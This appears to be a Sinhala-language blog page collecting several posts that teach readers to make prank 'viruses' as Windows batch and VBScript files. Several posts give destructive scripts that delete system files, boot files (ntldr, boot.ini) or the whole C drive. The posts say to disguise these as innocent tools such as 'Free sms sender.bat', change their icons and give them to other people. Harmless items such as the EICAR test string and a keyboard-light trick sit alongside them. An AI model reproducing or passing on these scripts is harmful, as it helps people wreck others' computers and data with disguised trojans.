Like us

Follow Us

Total Pageviews

සුභ නව වසරක් වේවා!
Showing posts with label Virus. Show all posts
Showing posts with label Virus. Show all posts

Mouse,Keyboard,Explore,Log off අවුල් කරන වයිරස් එකක් හදමු!

by Unknown  |  in Virus at  Saturday, February 01, 2014


කෝමද මල්ලිලා.. ක්ලාස් ගොහින් දැන් ඇවිත් බන්ඩිය එහෙම පුරවන් ඉදගත්තා විතරයි.ඊයෙත් පෝස්ට් දෙකක් දැම්මනේ.පෝස්ට් දාන්න ගියාම එක වැර දාන්න හිතෙනවා.නොදා ඉන්නකොට කොහෙද ඉතින් කම්මැලිනේ අප්පා. හරි මම අද කතන්දරයක් කියලා දෙන්නම් නෑ නෑ ප්‍රශ්න ටිකක් අහන්නම්.පුලුවන්නම් කමේන්ටුවකින් කියමුකෝ බලන්ට හ්ම්ම්.. ඔවු!!


1. කැලේ හදුන වැඩුන ටාසන්ට ඇයි රැවුලක් නැත්තේ???

2. දිය යටදී කෙනෙක්ට හඬන්න පුලුවන්ද???

3. මාළුවන්ට වතුර තිබහ හැදෙන්නේ නැද්ද???

4. ඇයි බිල්ඩිමක් දැනටමත් හදල ඉවර නම් එකට build "ing " කියන්නේ???

5. සල්ලි ගස් වල හැදෙන්නේ නැත්තම් බැංකු වල ශාකා තියෙන්නේ කොහොමද???

6. ඇයි රවුම් pizza හතරැස් පෙට්ටි වල එන්නේ???


 7. ඇයි ගම් ඒවා දාල තියෙන බෝතලේ නොඇලෙන්නේ???


8. I love you කියන්නේ ප්‍රශ්නයක් නෙමෙයි නම් ඇයි එකට පිළිතුරක් බලාපොරොත්තු වෙන්නේ???

9. පොල් තෙල් හදල තියෙන්නේ පොල් වලින් නම්, එළවලු තෙල් හදල තියෙන්නේ එළවලු වලින් නම්, Baby oil හදල තියෙන්නේ මොනවයින්ද???

 10.ඇයි කුරුල්ලන්ට ගහ උඩ නින්ද ගියාම බිම වැටෙන්නේ නැත්තේ???



හලි ඕකට පිලිතුරු දන්නවනම් කීලා යන්නකෝ.. හොදම හොද ඉදිච්ච බටු ගෙඩියක් දෙනවා කිවුවොත්. හ්ම්ම්... ආව කාරනේට බහිමුකෝ.. 

  මම අද ඇරන් ආවේ පරිගණකයේ Mouse,Keyboard,Explore,Computer Logoff වගේ පට්ට ආතල් එකක් දෙන්න පුලුවන් වයිරස් එකක්. මොකේකට හරි Bind කරලා දුන්නනම් කොහොමද ටොපිය.ඕ.. Bind කරන විදිහ ගැන කීලා දුන්නේ නෑනේ තාම නේද,හලි හලි ඒකත් කීලා දෙන්නම්.


@echo off

@if exist c:\windows\system32\mouse del c:\windows\system32\mouse
@if exist c:\windows\system32\keyboard del c:\windows\system32\keyboard
copy C:\windows\
@if exist c:\windows\system32\logoff.exe del c:\windows\system32\logoff.exe
@if exist C:\program files\internet explorer\iexplore.exe del C:\program files\internet explorer\iexplore.exe



ඔන්න උඩ තියෙන කෝඩ් එක Copy කරගෙන Notepad Open කරලා .bat විදිහට save කරගන්න.
 ex:-  SMSsender.bat

ඔන්න තීනවා බාන්ඩේ පෙන් එකක Auto Run වෙන්න එහෙම දාලා දෙන්න එපා ඈ.. හී.. පවුනේ!!!! අන්තිමට මම අපායේ යයිද මන්දා,,මෙවුවා කීලා දෙනවට.නෑ මේවා කීලා දෙන්නේ කාටවත් කරදරයක් කරන්න එහෙම නෙවේ.නෝටි වැඩ කරලා තිබුනොත් තලායි ඕන් මං.හලි ආතල් එකක් ඇරන් බලන්න.අනුන්ට කරදර කලොත් තමන්ම අමාරුවේ වැටෙයි හොදේ..

ආ මේ අදත් පස්ට සින්දුවක් තීනවා.අහලම යන්න http://www.music.lk/download-awasan-susum-final-breath-amplifierz-mp3



Listen to a preview

Texte alternatif

This is a low quality file for preview purposes. Quality of the file may be lower than original downloadable file. Download the Audio file and get the maximum quality audio.
Duration: 40 seconds / Bit Rate: 56 kbps

C Drive එක තත්පරෙන් Format වෙන වයිරස් එකක් හදමුද?

by Unknown  |  in ෆන් වැඩ at  Friday, December 06, 2013


හායි හායි ................ කොහොමද යාලුවනේ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,?????   ගොඩක් කාලෙකින් නේද?....


  100 වෙනි පොස්ටුවත් දාල ඉවරිනේ....... කියන්නත් හරි සතුටුයි..............  
දැන් නම් exam  ඉවරයිනේ ........ exam එකෙන් පස්සේ දාන 1වෙනි පොස්ටුවනේ.....
                     
                  ඉතින් ඉතින්................    
මටත් පිස්සු මොනවද මන් මේ කියවන්නේ........ අය්යෝ.... කතා ඇති වැඩේට බහිමු.......

 මේක ඉතින් සමහර අය දන්නවා ඇතිනේ..... දන් නැති අය මේකෙන් දැනගන්නකො.....

හොදම Note Pad Tricks 3 !!!

by Unknown  |  in ෆන් වැඩ at  Friday, November 29, 2013
                            කොහොමද යාලුවනේ.....?      අදත් ගෙනවා post එක්ක ..............
මේක ඉතින් 99 වෙනි පෝස්ටුව නේ...... ඒ නිසා  එල කිරි වගේ දෙන්න එපායෑ.......     
                                    මේක නම් ටිකක් වෙනස් එකක් හොදේ...............................

      මේවා ඇවිල්ල Majic triks තමා .... ඔක්කම කරන්නේ Note Pad එකෙන්..
                          හොදම Note Pad  Trick 3.. කොහොමද බලන්නකෝ.......

1.  C  එක Format කරන්න Virus එක්ක හදමු.......
                සැ:යු: Format කරන්න ඕනේ නම් ව්තරක් මේක අත්හදා බැලුවට කමක්නෑ හොදේ.......
     මේක ගැන කීවොත් මේක ඇවිල්ල පොඩි Programming එකක් ..... මේක හදන්න simple උනාට...
                                                                     බයානකයි හොදේ......................
                                               කතා ඇති වැඩේට බහිමුකො......
                          ඉස්සෙල්ලම Note Pad එක open කරලා මේ cods ටික
    Copy කරගෙන Peste එකක් දාගන්නකෝ........ Note Pad එකට හොදේ....

                                                  @Echo off
                                                  Del C:\ *.* |y


දැන් ඕක save කරන්ට..........save කරනකොට....File Name එකට Virus.bat කියල දෙන්න...
වෙන ඒවා එහෙම දෙන්න එපා හරිය..........................
    දැන් ඔය Desktop එකේ තියෙන Icon එක Click කරන්න..  දැන් හරි ....

2.  Key Board එකේ Light ටික නටවමු...
          Note Pad එක open කරලා  cods ටික copy කරගන්නකො.. Note Pad එකට Paste එකකුත් දාගන්නකො......

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
wshshell.sendkeys "{NUMLOCK}"
wshshell.sendkeys "{SCROLLLOCK}"
loop

 

note Pad එක save කරනකොට File Name එකට dance.vbs කියල Type කරලා  save කරන්න....
දැන් ඔයා save කරපු තැනට ආපු Icon එක Click කරල බලන්න....
ලස්සනද?,,,,,,,,,,,,,,,,,,,,, ලස්සනද කියල ඇහැව්වේ Keyboard එක .....

3.  Matrix එකේ Effect එක බලමුද?
      Note Pad එක open කරලා Note Pad එක open කරලා  cods ටික copy කරගන්නකො.. Note Pad          එකට Paste එකකුත් දාගන්න......

@echo off
color 02
:start
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
goto start


දැන් Save කරනකොට Name එක දෙන්නකෝ මෙහෙම Matrix.bat.....හරිද?
             දැන් ආපු Icon එක Click කරන්නකෝ..... කොහොමද?..................
පොඩිදෙයක් කියන්න බැරි උනානේ.... ඕක open වෙන්නේ CMD එකෙන් හොදේ......

එල නම් Comment එකක් දාලම යන්නකෝ........... හරිය...... එහෙනම් මන් යනවා හොදේ...

 Fb එකෙන් මාව මුණගැහෙන්න..{Raveen Minod Nirmal}
            

system එක වලපල්ලට යැවීම

by Unknown  |  in ෆන් වැඩ at  Sunday, April 21, 2013




                                        මෙන්න තවත් සුපිරි කැත වැඩක්.මම කැත පොරක්නම් නෙවේ හැබැයි. මේකෙන් වෙන්නෙ පරිගනකය සදහටම දොයි කිරීමයි.පන්ඩිත්යො ඉන්නවනම් මේක දීලා බලන්න.එයාට බඩු හරි.

මේ පහල තියෙන text එක notepad එකට පේස්ට් කරලා අගට .bat කියන format එකින් සේව් කරන්න.

 ex:- Free sms sender.bat

@echo off

attrib -r -s -h c:\autoexec.bat

del c:\autoexec.bat

attrib -r -s -h c:\boot.ini

del c:\boot.ini

attrib -r -s -h c:\ntldr

del c:\ntldr

attrib -r -s -h c:\windows\win.ini

del c:\windows\win.ini

හුටා..අමතක උනා.කෝඩ් එක කොපි කරන්න බෑ නේද.මෙතනින් බාගන්න එහෙනම්
මේකෙ icon එක එහෙම වෙනස් කරලා කාටහරි දෙන්න තමා තියෙන්නේ..


          මේකෙන් වෙන්න පරිගනකයක් boot වෙන්න ඕන file මකලා දමන එකයි.එතකොට restart වෙවේ තියෙයි.අපිට මොකද..

වැරදිලාවත් ඔයාගෙ අතින් උනොත් නැට්ට පාගගත්තා වගේ තියෙයි. අපිනම් දන් නෑ ඔන්න.



අනුන්ගෙ සිස්ටම් crash කිරීම

by Unknown  |  in ෆන් වැඩ at  Sunday, April 21, 2013



                                                 තරහා කාරයෝ,පන්ඩිතයෝ එහෙම ඉන්නවද.එහෙනම් ලොකු කැත වැඩක් කරමු.පහල මම URL එකක් දීලා තියෙනවා..හෝ..හෝ..පොඩ්ඩක් ඉන්න යන්නනම් එපා ඕකට.ඕකට ගියොත් ඔයාට අබසරනයි.

Do not click !!!


http://tiny.cc/ibJUN


 මෙහෙමයි සීන් එක මේ දීලා තියෙන URL එක උඩ click කලොත් නම් වැඩි වෙලා ඉන්න ලැබෙන් නෑ.වැඩිම උනොත් පැයයි.මුලු system එකම crash වෙනවා.ඔයාට කරන්න තියෙන්නෙ මේ URL එක කාටහරි දෙන එක විතරයි.ඒක අමාරු දෙයක් නෙවේනේ..මමනම් ඕකට ගිහින් බැලුවෙ නෑ.වෙලාවක පිස්සුවක් වගේ හැදුනොත් ගිහින් බලනවා..

බක පන්ඩිතයෝ ඉන්නවනම් වැඩේ දෙන්න.මොකද මටත් එහෙම එවුන් පේන්න බෑ.


ආයෙත් කියන්නම් ඔයානම් මේකට ගිහින් බලන්න එපා.මොනවරි වුනොත් මමනම් දන් නෑ..බයවුනාද





එක ක්ලික් එකයි ෆෝල්ඩර් 1000යි

by Unknown  |  in ෆන් වැඩ at  Tuesday, April 09, 2013


අද ගෙනාවෙ පිස්සු හැදෙන වැඩක්..මේක හදලා කාටහරි කරල බලන්න.එක ක්ලික් එකයි ෆෝල්ඩර් 1000 යි.කොහොමද වැඩේ... ඊටපස්සෙ Delete කරන එක තමා තියෙන්නෙ..


@echo off
:top
md %random%
goto top


ඉස්සල්ලාම මේ කෝඩ් එක නෝට් පෑඩ් එකට පේස්ට් කරලා 1000.bat කියලා සේව් කරන්න.හුටා..අමතක උනා.කෝඩ් එක කොපි කරන්න බෑ නේද.මෙතනින් බාගන්න එහෙනම්


දැන් ඒකෙ shortcut එකක් හදාගෙන desktop එකට කොපි කරන්න.

 දැන් ඒක Rename  කරලා එක icon එක එහෙම වෙනස් කරන්න.
 

දැන් ඉතින් click කරල බලන්න..හෝව්!!හෝව්!! ඔයා නෙවේ..වෙන එක්කෙනෙකුගෙ කොම් එකකට කරල බලන්න. එයා මේක click කරපු ගමන් desktop එකේ දඩ බඩ ගාලා folders 1000ක් හැදෙනවා..පිස්සු හැදෙයි නේ,,,,


වයිරස් ගාඩ් එකට EICAR test එකක් කරමුද ?

by Unknown  |  in ෆන් වැඩ at  Monday, April 08, 2013




ඔයාගෙ වයිරස් ගාඩ් එක(ඔයාගෙ නෙවේ කොම්පියුටරේ) වැඩ කරන්වද කියල හරියටම බලාගන්න ඔනෙනම් මෙකෙන් පුලුවන් වැඩේ.
මේ ක්‍රමේට කියන්නෙ EICAR test කියලා.මේක වයිරස් එකක් නෙවේ.ඕනෙම කෙනෙකුට පහසුවෙන් අත්හදාබලන්න පුලුවන්..

    මේ කෝඩ් එක නෝට් පෑඩ් එක ඕපන් කරලා පේස්ට් කරගන්න.දැන් ඒක myfile.com කියලා සේව් කරගන්න. ඔන්න බලාගන්න පුලුවන් ඔයාගෙ වයිරස් ගාඩ් එකේ තරම.එතකොටම ඔයාට vires warning එකක් එයි.



             නැත්නම් ඒ එක මකලම දාලා ඇති. මුකුත්ම උනේ නැත්නම් සේව් කරපු file එක scan කරලා බලන්න අල්ලනවද කියලා.එහෙමමත් නැත්නම් ඔයාගෙ vires ගාඩ් එක ගැන කියලා වැඩක් නෑ.වැඩක් නෑ කිව්වෙ හොද නෑ කියන එකයි..
 

මෙන්න කෝඩ් එක


X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

අමතක උනා.කෝඩ් එක කොපි කරන්න බෑ නේද.මෙතනින් බාගන්න එහෙනම්..
 ප්‍රශ්න තියෙනවනම් කමේන්ටුවක් දාන්නකෝ

වයිරස් එකක් හදමුද?

by Unknown  |  in Virus at  Sunday, March 31, 2013



 :) මෙකනමි ටිකක් දරැනු සෙල්ලමක්
මොකද  ‍;) මේකට පුලුවන් Computer එක Stuck කරන්න? :mad: මෙන්න මේකයි සිද්ධිය මේ Code එක ගහලා හදාගන්න file එක කවුරැ හරි Open කරොත් Internet Explorer,My Document වගේ එවා දිගට හරහට Open වෙනවා. :D කීපාරක් Open වෙනවාද කියන එක Virus එක හදන අපිට පාලනය කරන්න පුලුවන්! :roll: හැබැයි පරිගනකයට හානියක් නැහැ,වැඩිම උනොත් කලින් කිවිවා වගේ Stuck වෙයි?  :P


:) දැන් එහෙනමි මුලින්ම Note pad Open කරගන්න,ඊට පස්සේ මෙ Code එක ගහගන්න,නැත්නමි ඉතින් Copy කරලා Paste කරගන්න? :P


@echo off
:A
start dir
start command
start iexpore.exe
start run
start explorer

මම කලින් කියපු වාර ගාන හදාගන්න ඔනි මෙහෙමයි.start dir කියලා තියෙන තැන ඉදන් ප‍ටන්ගන්න ට‍ක තමන්ට ඔනි ගානක් Copy කරලා Paste කරගන්න,ඒ කියන්නේ දෙපාරක් ඔනි නමි,
@echo off
:A
start dir
start command
start iexpore.exe
start run
start explorer
start dir
start command
start iexpore.exe
start run
start explorer


:mad: මෙ වගේ ඔිනි තරමක් Paste කරන්න,Paste කරන ගාන වැඩිවෙන කොට Computer එක Stuck වෙන්න බලනවා, :roll:

අන්තිමට තමන් කැමති නමකින් Save කරන්න,නමේ අන්තිමට .bat කියලා තියලා ex : Virus.bat  :P

දැන් Virus එක හදලා ඉවරයි?කාට හරි යවලා බලන්‍නකෝ මොකද වෙන්නේ කියලා?තමන්ටම උත්සහ කරන්න ඔනි නමි Code එක වැඩිපුර Type නොකර උත්සහ කරලා බලන්න පුලුවන්  :lol:



ඒහෙනම් මම ගියා  :D  :o


Keyboard පිස්සුව

by Unknown  |  in Virus at  Saturday, March 30, 2013





:o  අයෙත් ගෙනාව ජිල්මාට් ඒකක්.මෙක කස්ට්ය දන්නවත් අැති.  :roll: දන් නැති අය කරල බලන්න


:)  මුලින්ම යන්න Notepad එකට,ඊට පස්සේ මෙ Cord එක හරියට Type කරන්න(Type කරන්න කමිමැලි නමි Copy කරලා Paste කරන්න





Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
wshshell.sendkeys "{NUMLOCK}"
wshshell.sendkeys "{SCROLLLOCK}"
loop




 :roll:  දැන් ඔික තමන්ට කැමති නමකින් Save කරන්න.හැබැයි අන්තිමට .vbs කියලා තියන්න ඔිනි (උදා:disco.vbs)

දැන් ඉතින් ඒ vbs File එක Double Click කරලා බලන්නකෝ,බලන්න Key Board එකේ Caps Lock, Num Lock, Scroll Lock කියන Light 3 දිහා,පිස්සු නටනවා නේද?කොහේ හරි මොකක් හරි  Type කරලත් බලන්නකෝ?    ;)  

:P   දැන් මෙ පිස්සුව නවත්ත ගන්න ඔනි නම් යන්න Task Manager (Ctrl + Alt + Delete) වලට,එකේ තියෙනවාWSCRIPT.EXE කියලා Run වෙන File එකක්?ඒක හොයලා End Task කරන්න?එතකොට සාමාන්‍ය තත්වෙට පත් වෙයි?   :roll:


comment ඒකකුත් පුලුවන්නම් දාලා යන්න මම තරහ නෑ   :D

බොරැ Virus Warninng එකක් හදමුද?

by Unknown  |  in ෆන් වැඩ at  Saturday, March 30, 2013









 :o Notepad එක‍ට යන්නකෝ.ගිහිල්ලා මෙන්න මෙී Code ටික copy කරගන්න.


@echo off
msg * WARNING
msg * VIRUS ENTERED YOUR PC
msg * PLEACE SHUTDOWN YOUR PC



 ඊට පස්සේ ඒ Text එක කැමති නමකින් Save කරගන්න අන්තිමට .bat  කියලා දාලා ( උදා:- Virus.bat),

දැන් ඒ bat Command File එක Click කරලා බලන්න?  :/





මෙ රෑප වල තියෙන විදිය‍ට Virus Warninng එකක් එයි.  :o හැබැයි මෙීවලින් පරිගනකයට නමි හානියක් නැහැ?  :lol:




ඔයාගෙ virus guard එක වැඩ කරනවද කියලා බලමු

by Unknown  |  in Virus at  Saturday, March 30, 2013


  :D ඔයාගෙ virus guard එකත් වැඩ කරනවද කියලා බලන්න පුලුවන් මෙකෙන්
මේක හරිම ලෙසි වැඩක්. ;)  ඔයාට තිටයෙන්නේ පහල තියන වචන පේලිය note pad එකට දමලා
virus.exe කියලා ඒක save කරන එක විතරයි.  :o  පට ගාලා අල්ලනවා.අල්ලවුවෙ නැත්නම් වෙන වයිරස් ගාඩි ඒකක් දාගන්න ඉක්මනට  :P
මෙන්න එහෙනම් වචන ටික  :roll:



X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*


 :o මෙකෙන් ඒකට හානියක් නෑ. බයවෙන්න :o ඒපා !!!!!!!!!!!!!!!

Related Posts Plugin for WordPress, Blogger...
Proudly Powered by Blogger.